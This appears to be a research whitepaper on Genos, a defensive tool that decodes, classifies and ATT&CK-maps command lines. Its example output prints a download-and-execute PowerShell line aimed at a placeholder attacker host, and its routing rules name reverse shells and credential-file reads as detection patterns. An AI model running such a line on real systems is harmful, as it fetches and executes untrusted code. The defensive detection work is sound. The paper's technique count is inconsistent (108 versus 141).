Genos: Command Intelligence for Real-Time Behavioral Threat Detection and MITRE ATT&CK Attribution

Ahmed Khan

Genos v1.2 · IEEE AIIoT 2026 · Research Whitepaper

Executive Summary

Security tools collect raw telemetry, but analysts still need to interpret intent. Genos introduces command intelligence: a hybrid system that deobfuscates command-line activity, classifies behavioral intent, and maps malicious actions to MITRE ATT&CK techniques in milliseconds. The system achieves Tier 1 AUC 0.9999 with F1 99.96% on binary threat classification, and 95.53% Top-1 / 97.94% Top-3 accuracy on 108-class MITRE technique attribution — operating at sub-100 ms latency without requiring cloud inference or external API calls. Genos is the research artifact underlying two accepted IEEE AIIoT 2026 papers and is designed as a deployable, analyst-facing intelligence layer for SOC triage, SIEM enrichment, and automated threat attribution.

Contents

The Problem with Command-Level Alert Triage
Command Intelligence as a Security Decision Layer
System Architecture Overview
Deobfuscation and Feature Extraction
Two-Stage Machine Learning Pipeline
1. Tier 1 — Gatekeeper
2. Tier 2 — Specialist
Hybrid Rule-Based and Learned Inference
Output Schema and Example Results
Benchmark Results
Security Operations Use Cases
API and Integrations
Deployment Architecture
Research Background and Publications
Future Work
References and Citation
Appendix — Technical Reference

1The Problem with Command-Level Alert Triage

Command-line activity is one of the richest behavioral signals available to a defender. Every living-off-the-land attack, every credential theft, every lateral movement attempt leaves a trace in process telemetry — yet most security platforms treat command-line data as opaque text, passing it through signature rules or handing it to an analyst with no structured interpretation.

The core difficulty is threefold. First, malicious commands are routinely obfuscated: Base64-encoded payloads, PowerShell character-code constructions, string concatenation, and nested encoding layers are standard adversary practice. A raw string match fails against these techniques by design. Second, even a plaintext command is deeply context-dependent — net user /domain is reconnaissance in one environment and routine IT administration in another. Third, the volume of command-line events in any moderately active environment is large enough that manual triage at scale is not feasible.

Existing approaches — YARA rules, keyword blocklists, traditional SIEM correlation — are brittle, require continuous manual maintenance, and produce high false-positive rates against obfuscated or novel payloads. Large language model-based approaches offer flexibility but introduce latency, cost, and non-determinism that are incompatible with real-time SOC workflows.

Analysts need a system that can decode, classify, and explain a command in one step — without cloud round-trips, without per-query billing, and without black-box outputs that cannot be audited.

2Command Intelligence as a Security Decision Layer

Genos is built around the concept of command intelligence: a structured, machine-readable behavioral interpretation of a raw command string. Rather than asking "does this match a known bad signature?", Genos asks three questions in sequence:

Is this command obfuscated? If so, recover the intended payload before any classification.
What is the behavioral intent? Route the command into a verdict — Benign, Suspicious, Malicious, or Context-Dependent — with a calibrated confidence score.
Which adversary technique does this represent? Map the command to one or more MITRE ATT&CK technique identifiers with per-technique confidence scores.

This three-question structure produces output that is immediately actionable: an analyst or automated system can triage, escalate, or suppress an alert based on a verdict and a named technique, rather than a raw alert count or a signature ID.

Command intelligence is designed to be a decision layer — sitting between raw telemetry collection (EDR, SIEM, UEBA) and analyst workflow — rather than a replacement for existing detection infrastructure. It enriches existing alerts with behavioral context and ATT&CK-aligned attribution that current tooling does not provide.

3System Architecture Overview

Genos processes every command through a sequential four-stage pipeline. Each stage produces structured output that feeds the next.

Raw Command Input

Stage 1

Entropy-Aware Deobfuscation

Detects encoding / obfuscation → iterative decoding
Output: decoded command + obfuscation flag

Stage 2 — Tier 1

Gatekeeper (Neural)

CodeBERT encoder → 3-class verdict + confidence
Rule-based routing layer overlaid on neural output
Output: Benign / Suspicious / Malicious / Context-Dep.

Stage 3 — Tier 2

Specialist (Classical ML)

TF-IDF char n-gram + Random Forest
108-class MITRE ATT&CK attribution (always runs)
Output: top-5 technique codes + per-code confidence

Structured JSON Response

verdict · confidence · MITRE codes · decoded payload

The two-tier inference design is deliberate. Tier 1 is a neural model: accurate and generalizable, but slower to train and update. Tier 2 is a classical ML pipeline: fast to retrain on new ATT&CK technique data, interpretable via feature weights, and independent of the neural model's internal representations. Keeping them separate means either tier can be improved or retrained without affecting the other.

The entire pipeline is served as a REST API via Gunicorn and Flask, bound to localhost and designed to sit behind a reverse proxy. No external inference calls are made at runtime — all computation is local.

4Deobfuscation and Feature Extraction

A critical requirement for any command intelligence system is the ability to handle adversarial encoding. In practice, a significant fraction of malicious commands in the wild are obfuscated — specifically to defeat signature-based detection. Genos addresses this with an entropy-aware, iterative deobfuscation pipeline that runs before any classification.

Obfuscation is detected using a combination of Shannon entropy thresholding (commands exceeding 5.2 bits/character are flagged) and pattern matching against six structural indicators: PowerShell character-code constructions, inline Base64 references, string reversal wrappers, concatenation fragments, long obfuscated variable names, and hex byte escapes.

When obfuscation is detected, the engine runs up to five decoding passes in sequence, applying: universal Base64 decoding, embedded FromBase64String() extraction, PowerShell invocation wrapper stripping, character-code resolution ([char]65, range-expansion patterns), and string concatenation collapsing. An optional AST-level simplification step is applied if the pyminusone library is installed. Each pass operates on the output of the previous, and the loop exits early when a pass produces no further entropy reduction (delta < 0.01 bits).

For Tier 2 attribution, the engine uses a structured "Variant A" text representation produced by the parser module, which extracts residual tokens — flags, arguments, paths, executables — separately from the normalized command body. This representation exposes structural features that improve technique attribution beyond raw text matching.

For obfuscated commands, Tier 2 runs twice — once on the original text, once on the decoded payload — and the results are merged by taking the highest confidence score per technique code, capped at five techniques in the final response.

5Two-Stage Machine Learning Pipeline

5.1Tier 1 — Gatekeeper

The Gatekeeper is a fine-tuned CodeBERT model trained for three-class classification: Benign, Malicious, and Context-Dependent. CodeBERT was selected over general-purpose language models because it was pre-trained on both natural language and code corpora, giving it a structural understanding of command syntax, flag conventions, and common shell patterns that generic text encoders lack.

The classification head is a two-layer MLP with GELU activation and dropout regularization, operating on the CLS token representation (768 dimensions). Inference runs under mixed-precision autocast — float16 on CUDA, bfloat16 on CPU — making it feasible to run on a single consumer GPU or a standard CPU server without significant latency penalty.

The Gatekeeper's raw neural output is a probability distribution over three classes. This distribution is then passed to a rule-based routing layer before the final verdict is issued, described in Section 6.

5.2Tier 2 — Specialist

The Specialist is a scikit-learn pipeline combining TF-IDF character n-gram features with a Random Forest classifier, trained to attribute commands to one of 108 MITRE ATT&CK techniques. It runs on every request regardless of the Tier 1 verdict — even commands classified as Benign receive a technique attribution, which can surface legitimate administrative commands that map to adversary-relevant behaviors (e.g., net user /domain mapping to T1087 — Account Discovery).

The choice of TF-IDF + Random Forest for Tier 2 is deliberate. Character n-gram features capture subword patterns — flag combinations, executable names, argument structure — that are highly informative for technique attribution and that persist across obfuscation variants. Random Forest provides calibrated per-class probability estimates and can be retrained on new technique data in minutes rather than hours, making it practical to keep the technique map current as the ATT&CK framework evolves.

Tier 2 inference takes approximately 90 ms and runs synchronously with Tier 1, adding negligible end-to-end latency relative to the neural forward pass.

6Hybrid Rule-Based and Learned Inference

A key architectural decision in Genos is the explicit separation of neural inference and deterministic rule evaluation. The Gatekeeper neural model produces a raw probability distribution, but this distribution is then processed by a rule-based routing layer before the final verdict is issued.

The routing layer operates in four modes:

Hard override to Malicious. Certain command patterns — Base64-decode piped to a shell interpreter, reverse shell constructions, direct reads of credential files — are treated as unconditionally malicious regardless of model confidence. These patterns represent confirmed attack techniques where no ambiguity is operationally acceptable.
Malicious promotion. Commands featuring high-risk behavioral signals (exploit tooling, access to sensitive system sources) that the neural model rates as weakly Benign or Suspicious are promoted to Malicious. This handles edge cases where the model generalizes conservatively.
Malicious cap. Commands that carry inherent risk but lack definitive attack indicators — for example, chmod 777 or crontab -l — are downgraded from Malicious to Suspicious, preventing over-escalation on common administrative operations.
Probability routing. Remaining cases are routed by a combination of confidence threshold, class margin, suspicious signal count, and extracted feature set — producing Benign, Suspicious, Malicious, or Context-Dependent verdicts accordingly.

This hybrid architecture is intentional. Pure neural approaches achieve high accuracy on in-distribution data but can produce unexpected outputs on novel obfuscation patterns or adversarially crafted inputs. Pure rule systems are brittle and require constant manual maintenance. The combination — neural model providing the base distribution, deterministic rules providing hard constraints and behavioral guardrails — produces a system that is both accurate and operationally auditable.

Every verdict issued by Genos is traceable: either to a model confidence score and routing threshold, or to a named rule that fired. This auditability is a first-class design requirement.

7Output Schema and Example Results

Every Genos response is a structured JSON object. The schema is consistent across all verdict types, with additional fields populated for obfuscated inputs and context-dependent classifications.

Example — Malicious command (encoded PowerShell reverse shell):

{
  "label": "Malicious",
  "label_confidence": 99.81,
  "deobfuscated_cmd": "invoke-webrequest http://attacker.com/malware.sh | iex",
  "MITRE_codes": [
    { "code": "T1059.001", "confidence": 97.43 },
    { "code": "T1071.001", "confidence": 1.22 },
    { "code": "T1105",     "confidence": 0.81 },
    { "code": "T1027",     "confidence": 0.48 },
    { "code": "T1086",     "confidence": 0.06 }
  ],
  "decoded_payload": "Invoke-WebRequest http://attacker.com/malware.sh | IEX"
}

Example — Benign administrative command:

{
  "label": "Benign",
  "label_confidence": 99.99,
  "deobfuscated_cmd": null,
  "MITRE_codes": []
}

Example — Context-dependent command requiring analyst review:

{
  "label": "Context_Dependent",
  "action": "requires_context",
  "label_confidence": 71.4,
  "MITRE_codes": [
    { "code": "T1087", "confidence": 88.21 }
  ]
}

Output field reference

Field	Type	Description
label	string	Verdict: Benign, Suspicious, Malicious, or Context_Dependent
label_confidence	float	Calibrated confidence as a percentage (0–100)
MITRE_codes	array	Top-5 technique attributions with per-code confidence; present on all responses
deobfuscated_cmd	string\|null	Decoded command text; null if no obfuscation was detected
decoded_payload	string	Populated for obfuscated inputs with a recoverable payload
action	string	Set to "requires_context" for Context_Dependent verdicts

8Benchmark Results

Genos was evaluated against held-out test splits and a deployment-aligned IEEE benchmark comparing the full neural pipeline against a TF-IDF + Random Forest baseline across multiple traffic compositions and obfuscation scenarios.

0.9999 Tier 1 AUC

99.96% Tier 1 F1

95.53% Tier 2 Top-1

97.94% Tier 2 Top-3

~90ms Tier 2 Latency

The IEEE benchmark evaluated the pipeline at multiple benign-to-malicious traffic ratios to simulate realistic SOC telemetry distributions. Results were stable across ratios, with no significant degradation in precision at high benign traffic volumes — a critical property for operational deployment where false-positive rates directly affect analyst workload.

The stress test (500 concurrent requests, 50% malicious, 20 workers) confirmed consistent throughput at the target latency envelope. Full benchmark artefacts — ROC curves, per-class F1 breakdowns, and latency distributions — are available in the repository's logs/ directory.

LLM comparison context

Genos was also benchmarked against LLM-based classification approaches for command intent labeling. The neural + rule hybrid pipeline matched or exceeded LLM accuracy on the evaluated corpus while operating at a fraction of the latency and without per-query API cost — a meaningful operational advantage for high-volume telemetry environments.

9Security Operations Use Cases

SOC Alert Triage

Genos can be integrated into a SOC workflow as a first-pass triage layer. Rather than routing every command-line alert to an analyst, a Genos verdict of Benign with high confidence can suppress the alert automatically. Malicious verdicts with ATT&CK technique codes are escalated directly to the relevant analyst queue with pre-populated context — reducing the time between detection and investigation from minutes to seconds.

SIEM Enrichment

Genos output can be written back to a SIEM as structured fields: verdict, confidence, MITRE technique IDs, and decoded payload. This transforms raw process creation logs into queryable behavioral data. Analysts can write SIEM rules against mitre_code:T1059 rather than maintaining fragile regex patterns against raw command text.

MSSP and MDR Platforms

For managed security providers handling telemetry from multiple clients, Genos provides a consistent, vendor-agnostic behavioral labeling layer. Because the pipeline runs locally and requires no external connectivity, it can be deployed in air-gapped or restricted environments where cloud inference is not permitted.

Automated Incident Response

The Context-Dependent verdict class is specifically designed for integration with automated decision workflows. When Genos returns action: requires_context, a downstream orchestration system can query additional telemetry — parent process, user context, network connections — and re-submit the enriched command for a final classification decision without human intervention.

10API and Integrations

Genos exposes a minimal REST API served by Gunicorn on 127.0.0.1:6001 by default, designed to sit behind a reverse proxy. Two scan endpoints are available.

POST /scan — production endpoint, MongoDB API-key authentication:

curl -X POST https://your-deployment/scan \
  -H "Content-Type: application/json" \
  -d '{"api_key": "YOUR_KEY", "command": "net user /domain"}'

POST /scan/internal — no-database endpoint for CI, testing, and integration:

curl -X POST http://127.0.0.1:6001/scan/internal \
  -H "Content-Type: application/json" \
  -d '{"command": "powershell -enc SQBuAHYAbwBrAGUA..."}'

The command field accepts both plain text and Base64-encoded strings. The API attempts a full Base64 decode before passing to the engine, falling back to plain text transparently — which means SIEM and EDR integrations can forward raw process arguments without pre-processing.

Integration with SIEM platforms can be achieved via Logstash or Elastic ingest pipelines calling the scan endpoint and writing the response fields back to the original event document. Python and Bash integration examples are included in the repository.

11Deployment Architecture

Genos is designed for single-server deployment with a reverse proxy. The Gunicorn worker is single-process to avoid multiplying GPU memory usage — a second worker would require a second copy of the CodeBERT model in VRAM. On a machine with a dedicated GPU and cached model weights, startup takes under 60 seconds; on CPU-only hardware, startup is longer but inference remains operationally viable at reduced throughput.

Deployment model

Internet / Internal Network

│
▼

[ Nginx / Caddy ] TLS termination, rate limiting

│
▼

[ Gunicorn worker ] 127.0.0.1:6001, single process

[ Flask app ]

[ GenosEngine ] Tier 1 (GPU) + Tier 2 (CPU)

│
▼

[ MongoDB ] API key auth + usage tracking

The system is production-hardened: model weights are loaded with weights_only=True to prevent arbitrary code execution via malicious checkpoints; the deobfuscation loop is bounded to five passes with an entropy-delta early-exit to prevent deobfuscation bombs; the internal scan endpoint is firewall-protected and optionally token-gated; and no real credentials or secrets are committed to the repository.

12Research Background and Publications

Genos is the primary research artifact from two papers accepted to the IEEE World AI IoT Congress (AIIoT 2026), Seattle, USA. Both papers are first-authored by Ahmed Khan.

Publication [1]

A Two-Stage Transformer-Based Framework for Command-Line Classification and MITRE ATT&CK Technique Mapping

Presents the cascaded CodeBERT + TF-IDF/RF architecture, deobfuscation pipeline, and evaluation results across 141 technique classes. Reports Tier 1 AUC 0.9999 / F1 99.96% and Tier 2 95.53% Top-1 / 97.94% Top-3 accuracy.

Publication [2]

Open-Source Next Gen Endpoint Detection & Response

Presents a kernel-driverless Ring 3 EDR research system using LoRA-fine-tuned RoBERTa for 4-class MITRE ATT&CK behavior detection, achieving 99.5% accuracy across a 1,200-case adversarial stress suite.

Both papers are published through the IEEE AIIoT 2026 programme. PDFs, BibTeX, and supplementary materials will be linked here upon publication.

13Future Work

The current Genos pipeline classifies each command independently. The most significant planned extension is sequence-level reasoning: modeling chains of commands — execution followed by persistence followed by lateral movement — as a temporally ordered adversary behavior graph, enabling detection of multi-stage attacks that are individually ambiguous but collectively unambiguous.

Additional planned directions include: expanded ATT&CK coverage beyond the current 108-technique Specialist map; integration of structured shell AST features as complementary inputs alongside TF-IDF representations; investigation of structure-aware pre-training objectives that better capture the syntactic properties of command-line data; and evaluation on cross-platform telemetry (Linux, macOS) beyond the current Windows-heavy training distribution.

14References and Citation

If you use Genos or build on this work, please cite the associated IEEE papers:

BibTeX

@inproceedings{khan2026genos,
  title     = {A Two-Stage Transformer-Based Framework for Command-Line
               Classification and MITRE ATT\&CK Technique Mapping},
  author    = {Khan, Ahmed},
  booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
  year      = {2026},
  address   = {Seattle, USA}
}

@inproceedings{khan2026edr,
  title     = {Open-Source Next Gen Endpoint Detection \& Response},
  author    = {Khan, Ahmed},
  booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
  year      = {2026},
  address   = {Seattle, USA}
}

Appendix — Technical Reference

The following sections contain implementation-level detail intended for developers integrating or extending Genos. They are not part of the primary research narrative.

A.1 — Tokenisation

Uses RobertaTokenizer from microsoft/codebert-base. Max length: 256 tokens (override with GENOS_MAX_TOKENS). Padding: max_length. Truncation enabled. Returns PyTorch tensors.

A.2 — Gatekeeper Architecture

CodeBERT [CLS] token (768-d) → Dropout(0.2) → Linear(768 → 1024) → GELU → Dropout(0.2) → Linear(1024 → 3)

Inference under torch.no_grad() + torch.amp.autocast: float16 on CUDA, bfloat16 on CPU.

A.3 — Environment Variables

Variable	Default	Purpose
MONGO_URI	—	MongoDB connection string; enables /scan
INTERNAL_TEST_TOKEN	—	Optional token for /scan/internal
GENOS_API_BIND	127.0.0.1:6001	Gunicorn bind address
GENOS_MAX_TOKENS	256	Tokeniser max sequence length

A.4 — Model Files

File	Purpose
models/gatekeeper.pt	Tier 1 CodeBERT weights (Git LFS)
models/specialist_tfidf_char_rf.pkl	Tier 2 active model (not in git, ~2.4 GB)
config/specialist_map.json	108-class MITRE technique index
config/gatekeeper_meta.json	Threshold and training metadata

A.5 — Startup Sequence

GenosEngine is constructed once on process start — no hot-reload. Asset paths are resolved in order: absolute path → relative to os.getcwd() → relative to engine.py directory. A warmup pass runs before traffic is accepted; GET /health returns {"status":"ok"} once complete.

A.6 — Gunicorn Settings

Setting	Value	Reason
workers	1	One model copy in GPU memory
worker_class	sync	CUDA cannot survive post-fork
timeout	300 s	Covers model load on startup
preload_app	unset	Prevents fork after CUDA init